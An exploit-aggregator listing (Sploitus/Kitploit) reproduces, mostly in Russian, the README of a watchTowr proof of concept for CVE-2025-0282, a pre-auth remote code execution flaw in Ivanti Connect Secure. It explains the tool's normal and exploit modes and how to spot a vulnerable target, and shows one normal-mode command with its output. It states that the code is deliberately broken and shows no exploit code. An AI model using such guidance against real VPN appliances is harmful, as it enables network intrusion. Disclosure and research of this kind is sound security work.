Sploitus

Exploit for CVE-2025-0282

kitploit Β· 2026-08-26

Exploit Code

MARKDOWN55 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WATCHTOWRLABS-CVE-2025-0282
# CVE-2025-0282

Ivanti Connect Secure IFT TLS Stack Overflow Pre-auth RCE (CVE-2025-0282)

Π­Ρ‚ΠΎΡ‚ ΠΊΠΎΠ΄ Π½Π°ΠΌΠ΅Ρ€Π΅Π½Π½ΠΎ сломан Π½Π΅Ρ‚Ρ€ΠΈΠ²ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ ΠΈ ΠΏΠΎΡ‚Ρ€Π΅Π±ΡƒΠ΅Ρ‚ усилий для Ρ€Π°Π±ΠΎΡ‚Ρ‹, ΠΊΠ°ΠΊ Π±Ρ‹Π»ΠΎ описано Ρ€Π°Π½Π΅Π΅ Π² нашСм Π±Π»ΠΎΠ³Π΅ ΠΎ ΠΌΠ΅Ρ‚ΠΎΠ΄ΠΈΠΊΠ΅ эксплуатации.

Π§Ρ‚ΠΎΠ±Ρ‹ ΠΏΠΎΠ½ΡΡ‚ΡŒ эту ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ, Π²Ρ‹ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ ΠΎΠ·Π½Π°ΠΊΠΎΠΌΠΈΡ‚ΡŒΡΡ с нашим тСхничСским Ρ€Π°Π·Π±ΠΎΡ€ΠΎΠΌ.

ΠŸΡ€ΠΎΡ…ΠΎΠΆΠ΄Π΅Π½ΠΈΠ΅ эксплуатации ΠΈ ΠΌΠ΅Ρ‚ΠΎΠ΄ΠΈΠΊΠΈ – Ivanti Connect Secure RCE (CVE-2025-0282)

# PoC

Код Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ Π² Π΄Π²ΡƒΡ… Ρ€Π΅ΠΆΠΈΠΌΠ°Ρ…:

  1. ΠžΠ±Ρ‹Ρ‡Π½Ρ‹ΠΉ Ρ€Π΅ΠΆΠΈΠΌ
  2. Π Π΅ΠΆΠΈΠΌ эксплуатации



НачнитС с запуска ΠΊΠΎΠ΄Π° Π² Β«ΠžΠ±Ρ‹Ρ‡Π½ΠΎΠΌΒ» Ρ€Π΅ΠΆΠΈΠΌΠ΅. Если Π²Ρ‹ ΡƒΠ²ΠΈΠ΄ΠΈΡ‚Π΅ запрос пароля, это ΠΎΠ·Π½Π°Ρ‡Π°Π΅Ρ‚, Ρ‡Ρ‚ΠΎ Ρ†Π΅Π»ΡŒ работоспособна. Π—Π°Ρ‚Π΅ΠΌ ΠΏΠ΅Ρ€Π΅ΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅ΡΡŒ Π² Β«Π Π΅ΠΆΠΈΠΌ эксплуатации». Если Π²Ρ‹ ΡƒΠ²ΠΈΠ΄ΠΈΡ‚Π΅ сообщСниС Β«Failed to complete authenticationΒ», Ρ†Π΅Π»ΡŒ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ уязвима. ΠžΠ±Ρ€Π°Ρ‚ΠΈΡ‚Π΅ Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅, Ρ‡Ρ‚ΠΎ ΠΊΠΎΠ΄ эксплойта содСрТит Тёстко Π·Π°Π΄Π°Π½Π½Ρ‹Π΅ адрСса ΠΈ смСщСния, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π²Π°ΠΌ Π½ΡƒΠΆΠ½ΠΎ Π±ΡƒΠ΄Π΅Ρ‚ ΠΈΠ·ΠΌΠ΅Π½ΠΈΡ‚ΡŒ для Ρ€Π°Π±ΠΎΡ‚Ρ‹ с вашСй ΠΎΠ΄ΠΎΠ±Ρ€Π΅Π½Π½ΠΎΠΉ Ρ†Π΅Π»ΡŒΡŽ.

### ΠžΠΆΠΈΠ΄Π°Π΅ΠΌΡ‹ΠΉ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚ ΠΎΠ±Ρ‹Ρ‡Π½ΠΎΠ³ΠΎ Ρ€Π΅ΠΆΠΈΠΌΠ°:

root@kitploit:~
    
    
    MODE=normal ./openconnect-9.12/openconnect --protocol=pulse --user=test 10.20.5.4  
                     __         .__  ___________                    
    __  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________ 
    \ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
     \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
      \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|   
                  \/          \/     \/                              
    
    
            (*) Ivanti Connect Secure IFT TLS Stack Overflow pre-auth RCE (CVE-2025-0282)
    
              - Sina Kheirkhah (@SinSinology) of watchTowr (some-email@example.com)
    
            CVEs: [CVE-2025-0282]
    
    Connected to 10.20.5.4:443
    SSL negotiation with 10.20.5.4
    Server certificate verify failed: signer not found
    
    Certificate from VPN server "10.20.5.4" failed verification.
    Reason: signer not found
    To trust this server in future, perhaps add this to your command line:
        --servercert pin-sha256:kE2T2Rx2hc9EquYWABzj22wil29SZezWLdJ7OnhpdMw=
    Enter 'yes' to accept, 'no' to abort; anything else to view: yes
    Connected to HTTPS on 10.20.5.4 with ciphersuite (TLS1.2)-(RSA)-(AES-256-GCM)
    Got HTTP response: HTTP/1.1 101 Switching Protocols
    Enter user credentials:
    Password: